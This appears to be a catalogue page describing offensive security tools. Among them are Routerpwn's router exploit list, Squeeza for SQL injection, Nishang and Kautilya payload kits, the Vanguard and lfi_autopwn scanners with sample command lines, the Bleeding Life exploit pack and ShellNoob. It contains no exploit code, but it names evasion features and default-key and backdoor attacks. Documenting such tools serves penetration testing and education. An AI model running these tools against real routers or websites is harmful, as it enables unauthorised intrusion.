== ROUTERPWN.com ==
Routerpwn.com is a web application that helps you in the exploitation of vulnerabilities in residential routers.

It is a compilation of ready to run local and remote web exploits.
Programmed in Javascript and HTML in order to run in all "smart phones" and mobile internet devices.
It is only one page, so you can store it offline for local exploitation without internet connection.

== Exploits ==
# 154 Total (11 Modules) 08/09/2012 #

Sagem Fast Telnet Root Password Generator
A1/Telekom PRG EAV4202N Default WPA Key Generator
Discus DRG A225 WiFi router Default WPA2-PSK Key Generator
Thomson BBox BBKeys TG787 Default Wireless Key Generator
EasyBox Standard WPA2 Key Generator
ZynOS (Huawei) Configuration Decompressor
Thomson SpeedTouch STKeys Default Wireless Key Generator
Huawei HG5XX Mac2wepkey Default Wireless Key Generator
Backdoor password in Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore)
Arris Password of The Day Generator

20x 27x authentication bypass (xss + info disclosure)
17x 18x 20x 27x CRLF denial of service remote MDC
17x 18x 20x 27x CRLF denial of service
17x 18x 20x 27x password_required.html authentication bypass
17x 18x 20x 27x CD35_SETUP_01 authentication bypass
17x 18x 20x 27x CD35_SETUP_01 password reset
17x 18x 20x 27x DSL denial of service
17x 18x 20x 27x mgmt_data configuration disclosure
17x 18x 20x 27x H04 authentication bypass
17x 18x 20x 27x 38x Add domain to hosts table CSRF
Backdoor password in Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore)
iMC Intelligent Management Center configuration disclosure
iMC Intelligent Management Center traversal
OfficeConnect command execution
AP 8760 auhentication bypass
OfficeConnect configuration disclosure
OfficeConnect 3CRWE454G72 configuration disclosure
3cradsl72 configuration disclosure
3cradsl72 information disclosure & authenication bypass
812 denial of service
812 denial of service 2

Vicnum (Hacking Game)

This is the vicnum project ("vicnum")

This project was registered on SourceForge.net on Jan 27, 2009, and is described by the project team as follows:

A flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. Helpful to IT auditors honing web security skills and setting up 'capture the flag' . Play the game at http://vicnum.ciphertechs.com

Vicnum (1.5) is an OWASP project consisting of multiple vulnerable web applications based on games commonly used to kill time. These applications demonstrate common web security problems such as cross site scripting, sql injections, and session management issues. The goal of this project is to strengthen security of web applications by educating different groups (students, management, users, developers, auditors) as to what might go wrong in a web app. And of course it's OK to have a little fun. There are currrently three applications (or challenges) in this version of Vicnum. Guessnum, a game to guess a number the computer has picked. Jotto, a game to guess a word the computer has picked. And the Union Challenge which is new to version 1.5 Besides untarring the tar into the right folder and some Apache webserver tweaking, three MySQL tables will need to be created.

Smartphone Pentest Framework

The product of a DARPA Cyber Fast Track grant, the Smartphone Pentest Framework is an open source security tool, designed to aid in assessing the security posture of smartphones in an environment. SPF Version 0.1 contains remote attacks, client side attacks, social engineering attacks, and post exploitation, targeting smartphone devices. SPF Version 0.1 includes a text based management console, a web based GUI, and a management Android app. Additionally, a post exploitation “agent” for the Android platform is included. SPF is an on going project with plans in the works for support for additional devices, more modules in each attack vector category, integration with existing tools such as Metasploit and SET, etc.


1. Name
Squeeza - SQL Injection without the pain of syringes

2. Authors
Marco Slaviero < marco(at)sensepost(dot)com >
Haroon Meer

3. License, version & release date
License : GPLv2
Version : v0.22
Release Date : 2008/08/24

4. Description
squeeza is a tool helps exploits SQL injection vulnerabilities in broken web applications. Its functionality is split into creating data on the database (by executing commands, copying in files, issuing new SQL queries) and extracting that data through various channels (dns, timing, http error messages)

Currently, it supports the following databases:

Microsoft SQL Server
MySQL (only when multi-queries are enable, which is not too common)
squeeza is not a tool for finding injection points. That recipe generally starts with 1 x analyst. #

5. Usage

5.1 Installation is easy. Untar the archive into an appropriate spot. > $tar xvzf squeeza-0.21.tar.gz
Thereafter, edit the configuration file. By default, this is called 'squeeza.config' and resides in the same directory as the rest of the scripts.
Off the bat, you'll want to edit at least the following configuration items:

The default mode is command mode, and the default channel is dns. ##

5.2 Data Flow Model As already mentioned, squeeza splits the creation of data at the server away from the extraction of that data off the server (within certain constraints). Data is created by a /mode/, and extracted via a /channel/. By doing so, it is possible to mix 'n match modes with channels, which we think is pretty nifty/flexible.

Currently supported modes:
command mode : supports commands execution on the database server
copy mode : supports copying of files from the database server to the local machine
sql mode : supports the execution of arbitrary sql queries

Currently supported channels:


Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests. It contains many interesting scripts like download and execute, keylogger, password hash dumper, time based payload and much more.

It contains many interesting scripts like download and execute, keylogger, dns txt pwnage, wait for command and much more.

All payloads and scripts are Get-Help compatible. Use "Get-Help -full" on a PowerShell prompt to get full help details.

Checkout svn repo for latest code
svn checkout http://nishang.googlecode.com/svn/trunk/ nishang


Kautilya is a toolkit which provides various payloads for a Human Interface Device which may help in breaking in a computer. Written in Ruby, the toolkit contains useful payloads and modules which could be used at different stages of a Penetration Test. Kautilya is tested with Teensy++ device but could be used with most of the HIDs. It has been successfully tested for breaking into Windows 7, Ubuntu11 and Mac OS X Lion.

- The Windows payloads and modules are written mostly in powershell (in combination with native commands) and are tested on Windows 7 and Windows 8.

- The Linux payloads are mostly shell scripts (those installed by default) in combination with commands. These are tested on Ubuntu 11.

- The OS X payloads are shell scripts (those installed by default) with usage of native commands. Tested on OS X Lion running on a VMWare

- To get the latest version of the toolkit you should checkout the svn repository using

"svn checkout http://kautilya.googlecode.com/svn/trunk/ kautilya"

In principle, Kautilya should work with any HID capable of acting as a keyboard. Kautilya has been tested on Teensy++2.0 and Teensy 3.0 from pjrc.com.


Vanguard is an extensible utility with module support built for testing different types of web exploitation on a given domain.

Main application features:
Fully Configurable
WebCrawlers crawl all open HTTP and HTTPS ports output from nmap
LibWhisker2 For HTTP IDS Evasion (Same options as nikto)
Tests via GET,POST, and COOKIE

Web penetration tests:
SQL injection (This test is signature free!)
LDAP Injection
File inclusion
Command Injection

perl scan.pl -h [hostname] -e [evasion option]

Application Dependencies:

Notice: You must run this application as root.
You must have nmap from http://nmap.org installed to run this application correctly.
Protip: You can undo the root requirement by removing the check for root and modifying the nmap configuration.

Perl Dependencies:
LibWhisker2 requires Net::SSLeay. You may need to get this from cpan, compile it in, or install it from your distribution's package manager.
Notice: You can install these libraries with cpan.

Lfi autopwn.pl

This script will attempt to gain code execution on sites vulnerable to local file inclusion via an httpd error log or by modifying the user-agent and including a file containing environment variables. The php code execution test is performed using an arithmetic challenge, and the script uses system() as its php execution function. The fact that every part of this process is randomized including the math challenge prevents signature based detection while LibWhisker provides IDS Evasion.

Session Splicing
User-Agent and Log injection
Arithmetic Test

perl lfi_autopwn.pl -h www.vuln.tld -u "/vuln.ext?page=main&foo=bar" -i page

Bleeding Life

Bleeding Life 2 is an exploit pack that affects the web browsers on the Microsoft Windows operating system with remote code execution buffer overflows.


shellnoob is a toolkit to help you write shellcode.

convert shellcode between different formats and sources. Formats currently supported: asm, bin, hex, obj, exe, C, python, ruby, pretty, safeasm, completec, shellstorm. (All details in the "Formats description" section.)
interactive asm-to-opcode conversion (and viceversa) mode. This is useful when you cannot use specific bytes in the shellcode and you want to figure out if a specific assembly instruction will cause problems.
support for both ATT & Intel syntax. Check the --intel switch.
support for 32 and 64 bits (when playing on x86_64 machine). Check the --64 switch.
resolve syscall numbers, constants, and error numbers (now implemented for real! Smile).
portable and easily deployable (it only relies on gcc/as/objdump and python). And it just one self-contained python script!
in-place development: you run ShellNoob directly on the target architecture!
built-in support for Linux/x86, Linux/x86_64, Linux/ARM, FreeBSD/x86, FreeBSD/x86_64.
"*prepend breakpoint*" option. Check the -c switch.
read from stdin / write to stdout support (use "-" as filename)
uber cheap debugging: check the --to-strace and --to-gdb option!
Use ShellNoob as a Python module in your scripts! Check the "ShellNoob as a library" section.
Verbose mode shows the low-level steps of the conversion: useful to debug / understand / learn!
Extra plugins: binary patching made easy with the --file-patch, --vm-patch, --fork-nopper options! (all details below)

Syndicate content